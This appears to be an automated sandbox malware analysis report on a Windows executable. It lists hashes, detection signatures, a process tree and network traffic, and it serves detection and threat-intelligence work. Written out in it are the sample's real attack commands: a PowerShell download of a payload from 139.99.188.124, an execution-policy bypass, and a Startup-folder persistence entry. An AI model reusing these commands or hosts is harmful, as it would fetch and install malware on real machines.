Windows Analysis Report
PPbimZI4LV.exe

Overview

General Information

Sample name: PPbimZI4LV.exe (renamed because original name is a hash value)
Original sample name: 3e60030e11271225fcc4e95aeb70447577882c697b54eeb83d5b6957b9c4bda3.exe
Analysis ID: 1577201
MD5: a9e7a83dd50b78bad39a2a57cbebb137
SHA1: c8634886fe1f814033d5303a29ed28909b8cea91
SHA256: 3e60030e11271225fcc4e95aeb70447577882c697b54eeb83d5b6957b9c4bda3
Tags: 139-99-188-124, exe, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • PPbimZI4LV.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\PPbimZI4LV.exe" MD5: A9E7A83DD50B78BAD39A2A57CBEBB137)
    • powershell.exe (PID: 1472 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7496 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Guard.exe (PID: 7808 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 7884 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 8040 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 8136 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • svchost.exe (PID: 4092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7496, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7808, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7496, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7808, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7884, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7496, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8040, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1472, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7496, ProcessName: powershell.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8040, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 8136, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1472, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8040, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4092, ProcessName: svchost.exe

Data Obfuscation

Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7884, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
No Suricata rule has matched

AV Detection

Source: http://139.99.188.124/BlQMSgJx.txt Avira URL Cloud: Label: malware
Source: PPbimZI4LV.exe Virustotal: Detection: 27%
Source: PPbimZI4LV.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: PPbimZI4LV.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_00007FF64399C7C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,1_2_00007FF6439AA4F8
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A6428 FindFirstFileW,FindNextFileW,FindClose,1_2_00007FF6439A6428
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,1_2_00007FF6439AA350
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00007FF6439AA874
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643962F50 FindFirstFileExW,1_2_00007FF643962F50
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_00007FF6439A72A8
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A71F4 FindFirstFileW,FindClose,1_2_00007FF6439A71F4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00007FF64399B7C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00007FF64399BC70
Source: C:\Users\Public\Guard.exeCode function: 11_2_00154005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00154005
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0015494A
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0015C2FF
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015CD14 FindFirstFileW,FindClose,11_2_0015CD14
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0015CD9F
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0015F5D8
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0015F735
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0015FA36
Source: C:\Users\Public\Guard.exeCode function: 11_2_00153CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00153CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C44005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00C44005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_00C4494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00C4C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_00C4CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4CD14 FindFirstFileW,FindClose,17_2_00C4CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00C4F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00C4F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00C4FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C43CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00C43CE2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 18 Dec 2024 08:19:17 GMT | Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 | Last-Modified: Tue, 03 Dec 2024 12:54:38 GMT | ETag: "da2a8-6285d2afd80b6" | Accept-Ranges: bytes | Content-Length: 893608 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /BlQMSgJx.txt HTTP/1.1 | Host: 139.99.188.124 | Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: global traffic HTTP traffic detected: GET /xvDYouPUJ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 139.99.188.124 | Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AE87C InternetReadFile,1_2_00007FF6439AE87C
Source: global traffic HTTP traffic detected: GET /xvDYouPUJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 139.99.188.124 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /BlQMSgJx.txt HTTP/1.1 Host: 139.99.188.124 Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5E8F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2316243026.0000022C5F817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5E8F7000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.1.drString found in binary or memory: http://139.99.188.124/BlQMSgJx.txt
Source: PPbimZI4LV.exe, 00000001.00000002.2264320173.0000019B59E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/xvDYouPUJ
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FCF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
